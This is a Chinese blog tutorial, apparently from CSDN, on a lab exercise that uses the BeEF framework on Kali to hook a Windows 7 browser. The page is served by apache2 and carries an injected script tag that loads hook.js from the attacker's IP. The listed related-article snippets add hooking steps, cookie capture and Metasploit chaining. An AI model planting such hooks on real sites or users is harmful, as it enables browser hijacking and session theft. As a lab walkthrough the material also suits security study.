Kali之Beef利用Xss进行钓鱼

最新推荐文章于 2024-07-15 02:33:42 发布
最新推荐文章于 2024-07-15 02:33:42 发布
阅读量1.7k 收藏 26
点赞数 3
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45908958/article/details/107177205
版权

1、操作准备

攻击机:Kali(ip地址:192.168.1.107)
受害者:Windows7 x64(ip地址:192.168.1.163)

2、配置Beef

进入beef的配置文件里

root@kali:~# vim /etc/beef-xss/config.yaml

在这里插入图片描述
在这里可以看到beef的默认用户名和密码,也可以进行修改,我这里对默认的密码进行了修改
注:(默认beef用户名和密码位User:beef,Password:beef)

3、启动Beef

root@kali:~# beef-xss

在这里插入图片描述在这里插入图片描述
输入账号密码进行登录

4、配置apache2

1.进入apache2的目录下将自己制作好的网页替换掉默认的index.html
2.将<script src="http://192.168.1.107:3000/hook.js"></script>挂到自己制作好的网页中
3.启动apache2

root@kali:~# /etc/init.d/apache2 start

5、进行钓鱼

1.Windows7访问该网页
在这里插入图片描述2.在kali上可以看到,受害者已经上线了
在这里插入图片描述
3.进行攻击
案例(这里通过beef给受害者发送一段音乐)
在这里插入图片描述
在受害者的浏览器上可以看到音乐已经被播放
在这里插入图片描述
warning :未经授权,不得转载
本文所介绍技术仅供参考学习,切勿恶意用途

My灬Future
关注
  • 3
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss利用kali神器beef
jiangliuzheng的专栏
07-14 3万+
1、beef基本配置 BeEFKali下默认安装,直接找到对应图标启动即可,但是默认设置未同Metasploit关联,无法使用msf模块,因此需要作如下配置连接msf 1、修改config.yaml 编辑 /usr/share/beef-xss/config.yaml metasploit: enable: false改为true 编辑 /usr/
BeEf利用跨站脚本漏洞进行钓鱼
qq_42773814的博客
01-19 2470
BeEf 简介 BeEf 是目前最为流行的 Web 框架攻击平台,专注于利用浏览器漏洞,它的全称是 The Browser Exploitation Framework 。 BeEf 提供一个 Web 界面来进行操作,只要访问了嵌入 hook.js 的页面,抑或执行了 hook.js 文件的浏览器,就会不断地以 GET 的方式将其自身的相关信息传到 BeEf 的服务端。 最新的kali系统已经不会默认安装 BeEf ,需要我们自行安装。 apt install beef-xss 安装完成后,直接
Beefxss使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
02-16 1万+
Beef-XSS是一款功能强大的「XSS漏洞利用工具」,kali自带,基于Ruby语言开发。
kalibeef的使用_kali没有beef(1)
2401_82645688的博客
05-16 1053
BeeF是前欧美最流行的web框架攻击平台,kali 集成Beef,而且Beef有很多好使的payload。例如,通过XSS这个简单的漏洞,BeeF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,强大的有些吓人。beef也是属于c/s结构,具体看图zombie(僵尸)即受害的浏览器。
beef-xss钓鱼
Williamanddog的博客
01-27 634
BeEF(Browser Exploitation Framework)是一款非常强大的Web框架攻击平台,集成了许多 payload,可以通过XSS漏洞配合JavaScript脚本和Metasploit进行渗透。如果你的kali中没有beef的话,执行sudo apt install beef-xss进行安装。_ip:3000/clone_pikachu ,可以看到beef中有机器上线,在页面中进行登录。找到配置文件/usr/share/beef-xss/config.yaml。回到前台查看是否一致。
xss--钓鱼beef
qq_51802152的博客
10-26 147
kali---beef 牛肉的使用
beef结合msf钓鱼
weixin_34174132的博客
03-17 658
Kali linux 系统默认未安装beef,需要自行安装12apt-getupdateapt-getinstallbeef-xss启动/usr/share/beef-xss12cd/usr/share/beef-xss./beef账号密码127.0.0.1:3000/ui/pannel beef/beef 嵌入代码<script src="Ip:3000/h...
BeEF-XSS在本机制作简易钓鱼网站
最新发布
dasdasdasvsdV的博客
07-15 357
BeEF(Browser Exploitation Framework)是一款非常强大的Web框架攻击平台,集成了许多payload,可以通过XSS漏洞配合JavaScript脚本和Metasploit(MSF)进行渗透。基于Ruby语言编写,并且支持图形化界面,操作简单。
kali linux小白学习(beef网络钓鱼攻击)
Build20的博客
06-01 287
之后,执行wget http://<your kali IP>:3000/hook.js -O /var/www/html/jquery.js命令,执行ls命令可看出生成了一个攻击文件jquery.js,该文件包含xss攻击代码<script src=打开var/www/html文件并查看里面的文件(linux目录下有个目录:/回到kali机,可以看到上钩了,我可以查看他的cookie了。之后进入靶机,把kali机的ip地址输入,可以看到上钩了。1.解析网页语言,如html,php,jsp等。
kali-linux下搭建DVWA环境
tb_youth的博客
12-01 908
1.克隆远程仓库 git clone https://github.com/ethicalhack3r/DVWA 2. cp -r DVWA/ /var/www/html/ cd /var/www/html/ 递归授权 chmod 777 -R DVWA/ 开启服务 service apache2 start service mysql start 查看上面两个服务开启...
BEEF的使用(简单版)
zzlx123的博客
12-20 2475
BeEF BEEF (The Browser Exploitation Framework):一款浏览器攻击框架,用Ruby语言开发的,Kali中默认安装的一个模块,用于实现对XSS漏洞的攻击和利用BeEF主要是往网页中插入一段名为hook.js的JS脚本代码,如果浏览器访问了有hook.js(钩子)的页面,就会被hook(勾住),勾连的浏览器会执行初始代码返回一些信息,接着目标主机会每隔一段...
Kali beef-xss实现Xss详细教程。
sunwanfulove的博客
09-28 3462
Kali beef-xss实现Xss详细教程。
beef-xss+Sunny-Ngrok实现内网穿透
qq_32006199的博客
07-15 1195
一、实验工具 1、kali linux 2019.1-vm-amd64 2、beef-xss 3、sunny-ngrok 二、步骤 1、运行sunny程序 ./sunny clientid 隧道id 2、自定义监听端口并开启beef-xss 修改配置文件,配置文件路径:/etc/beef-xss/config.yam 启动beef-xss beef-xss 3、在目标网站的注入点进行xss...
beef自动化攻击(5)
从来不在调
03-06 1089
环境metaspoit+beef.利用autorun自动7化攻击 时间就是胜利,在勾住浏览器那短短时间内,如何完成一次高质量攻击呢? 利用BEEF REST API和浏览器交互速度将会大大增强。 首先写一个自动脚本,检查是否有挂钩,然后自动利用模块攻击。 beef injection framework自带的 autorun就可以完成这个任务。首先适当编辑autorun.rb脚本 编辑如(下
BeEF+ngrok实现内网穿透效果的主机控制
大方子
04-27 1283
NGROK:https://bin.equinox.io BeEF:https://github.com/sdfzy/BeeF-Over-Wan 1.先去下载linux 版本的ngrok 2.zip压缩包放到/usr/local/bin目录下解压并配置 token 3.切换到/root/.ngrok2目录配置ngrok.yml文件 把BeEF需要监听的内容写入ngro...
浏览器攻击框架BeEF Part 2:初始化控制
Fly_鹏程万里
08-22 1189
前言 在上一章,笔者已经介绍了BeEF框架。在这一章,笔者将介绍攻击浏览器技术的第一步:初始控制。 浏览器攻击方法流程 攻击浏览器一般分为几个阶段,看下图: 整个过程分为三个步骤,第一步是初始化控制,第二步是持续控制,第三步是攻击。在第三步中的七个攻击方法是可以交叉的,比如可以同时攻击用户和攻击Web应用。接下来会一章一章的介绍这些内容。这一章介绍初始化控制。 初始化控制 首先在这...
BeEF新手记录
OldBowl
11-29 2866
beef 新手
kaliXSSbeef的使用
weixin_30729609的博客
06-07 327
KaliBeef的安装和使用: 先打开终端输入 apt-get install beef-xss 然后切换到beef的安装目录 cd /usr/share/beef-xss 然后启动beef ./beef 这里要改一下密码才能用 2019.2beef密码太简单不行 我改成了 admin password 转载于:https://...
【web渗透】XSS 利用工具Kali Linux BEEF
程序员石磊
05-29 3501
BEEF进行xss攻击大概思路 接启动beef xss awvs 扫描目标端,找到xxs注入点。 注入beef 的hook.js. 等待用户触发注入的js 去beef平台观察浏览器上线请看,还能查看一些cookie信息,对浏览器进行控制。 如果拿到cookie就很危险了,我这里可以用程序模拟登陆,Http头信息携带拿到的cookie,进可以进入系统了。 下面给出一个转载的操作截图 直接启动b...
kali BEEF-XSS启动报错解决
06-01
启动BEEF-XSS时出现错误可能有多种原因,以下是一些常见的解决方法: 1. 检查端口是否被占用:BEEF-XSS默认使用3000端口,确保该端口没有被其他程序占用。 2. 检查依赖项是否安装:BEEF-XSS需要一些依赖项支持,如Ruby、RubyGems、Bundler等。确保这些依赖项已经正确安装。 3. 更新BEEF-XSS:如果你使用的是旧版本的BEEF-XSS,尝试更新到最新版本。 4. 重启BEEF-XSS:有时候重启BEEF-XSS可以解决某些问题。 如果以上方法都无法解决问题,可以尝试在启动BEEF-XSS时添加“--debug”参数,查看更详细的错误信息,以便更好地定位和解决问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值